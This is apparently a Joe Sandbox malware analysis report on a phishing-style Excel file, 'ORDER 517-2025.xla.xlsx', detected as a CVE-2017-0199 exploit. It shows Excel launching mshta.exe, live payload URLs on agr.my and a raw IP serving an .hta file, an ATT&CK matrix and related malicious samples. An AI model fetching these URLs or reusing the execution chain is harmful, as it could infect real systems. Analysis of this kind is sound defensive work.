Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 13.107.246.38:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 13.107.246.38:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficHTTP traffic detected: GET /mSGalN?&morning HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /mSGalN?&morning HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 209.46.124.102
Source: global trafficDNS traffic detected: DNS query: agr.my
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: ORDER 517-2025.xla.xlsxString found in binary or memory: https://agr.my/mSGalN?&morning&h
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.38:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: ORDER 517-2025.xla.xlsxOLE indicator, VBA macros: true
Source: ORDER 517-2025.xla.xlsxStream path 'MBD00E31B39/\x1Ole' : https://agr.my/mSGalN?&morning&h>X F'NQCt:{&Y1#v3}%S`MRBy96Lba+8fng]&QfN/TV:<y2{Od|2+y60KL9*zplypVnjO9PquZChKNo52HNhFXJoj2NHp98mQdmxJVtOnGyX2c21asMPRsXd7o7D4IqX4uUZSFEkNZXkh4aAZI4jY3pXPocD5CgbrdMw9WpKq5VnGKV2KXPKMA5PgkOUpq3jYho8fVNfxmKneqPR1AEhjUwQN3o7RIZdZM80ZO8i6KQf7B2NIEH9j9DCvy1ISEc]w`n!W=z^
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'order 517-2025.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal56.expl.winXLSX@6/4@4/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDER 517-2025.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{28591364-60F0-47BA-9E82-F9182EB1EDCF} - OProcSessId.datJump to behavior
Source: ORDER 517-2025.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ORDER 517-2025.xla.xlsxVirustotal: Detection: 28%
Source: ORDER 517-2025.xla.xlsxReversingLabs: Detection: 25%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: ORDER 517-2025.xla.xlsxStatic file information: File size 1263104 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ORDER 517-2025.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: ORDER 517-2025.xla.xlsxStream path 'MBD00E31B38/Package' entropy: 7.99513339556 (max. 8.0)
Source: ORDER 517-2025.xla.xlsxStream path 'Workbook' entropy: 7.99540760462 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 853Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648793 Sample: ORDER 517-2025.xla.xlsx Startdate: 26/03/2025 Architecture: WINDOWS Score: 56 19 star-azurefd-prod.trafficmanager.net 2->19 21 shed.dual-low.s-part-0010.t-0009.t-msedge.net 2->21 23 4 other IPs or domains 2->23 31 Multi AV Scanner detection for submitted file 2->31 33 Document exploit detected (process start blacklist hit) 2->33 35 Sigma detected: Suspicious Microsoft Office Child Process 2->35 7 EXCEL.EXE 229 62 2->7         started        11 EXCEL.EXE 48 49 2->11         started        signatures3 process4 dnsIp5 25 209.46.124.102, 49698, 80 SRS-6-Z-7381US United States 7->25 27 s-part-0010.t-0009.t-msedge.net 13.107.246.38, 443, 49700, 49701 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->27 29 agr.my 147.79.86.93, 443, 49697 EKSENBILISIMTR United States 7->29 17 C:\Users\user\...\~$ORDER 517-2025.xla.xlsx, data 7->17 dropped 13 splwow64.exe 1 7->13         started        15 mshta.exe 7->15         started        file6 process7

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ORDER 517-2025.xla.xlsx28%VirustotalBrowse
ORDER 517-2025.xla.xlsx25%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://agr.my/mSGalN?&morning0%Avira URL Cloudsafe
https://agr.my/mSGalN?&morning&h0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0010.t-0009.t-msedge.net
13.107.246.38
truefalse
    		high
    bg.microsoft.map.fastly.net
    		199.232.210.172
    		truefalse
      		high
      agr.my
      		147.79.86.93
      		truefalse
        		unknown
        s-0005.dual-s-msedge.net
        		52.123.129.14
        		truefalse
          		high
          otelrules.svc.static.microsoft
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://agr.my/mSGalN?&morningfalse
            • Avira URL Cloud: safe
            		unknown
            https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
              		high
              https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                		high
                https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                  		high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://agr.my/mSGalN?&morning&hORDER 517-2025.xla.xlsxfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  209.46.124.102
                  		unknownUnited States
                  		7381SRS-6-Z-7381USfalse
                  147.79.86.93
                  		agr.myUnited States
                  		208485EKSENBILISIMTRfalse
                  13.107.246.38
                  		s-part-0010.t-0009.t-msedge.netUnited States
                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1648793
                  Start date and time:2025-03-26 08:10:36 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 20s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:ORDER 517-2025.xla.xlsx
                  Detection:MAL
                  Classification:mal56.expl.winXLSX@6/4@4/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                  • Excluded IPs from analysis (whitelisted): 52.109.20.38, 52.109.6.63, 184.31.69.3, 199.232.210.172, 20.52.64.200, 23.204.23.20, 20.189.173.1, 52.123.129.14, 40.126.24.148, 4.175.87.197
                  • Excluded domains from analysis (whitelisted): onedscolprdwus00.westus.cloudapp.azure.com, slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, eus2-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, onedscolprdgwc02.germanywestcentral.cloudapp.azure.com, osiprod-eus2-buff-azsc-000.eastus2.cloudapp.azure.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, config.officeapps.live.com, us.configsvc1.live.com.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:12:47API Interceptor901x Sleep call for process: splwow64.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  209.46.124.102PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 209.46.124.102/xampp/dvine/devinebestangelcameonearthwitblessnigentiretiem.hta
                  PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 209.46.124.102/xampp/dvine/devinebestangelcameonearthwitblessnigentiretiem.hta
                  PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 209.46.124.102/xampp/dvine/devinebestangelcameonearthwitblessnigentiretiem.hta
                  147.79.86.93Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                    Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      13.107.246.38EwZAaQu0yXKbde7.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                        http://loginmlcrosoftonline365.utzsnacks.com.ribeiroautocapas.com.br/cgi-bin/reset/authorize?email=priceandpromosupport@utzsnacks.comGet hashmaliciousHTMLPhisherBrowse
                          AliareV0.1.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                            Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msgGet hashmaliciousUnknownBrowse
                              https://1drv.ms/o/c/8fc032da5fada757/EgEHU26Ga4FAl_1Su2lfpkUBqQItqpp0mP4_5cipPDmMcg?e=PyJVMiGet hashmaliciousUnknownBrowse
                                PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
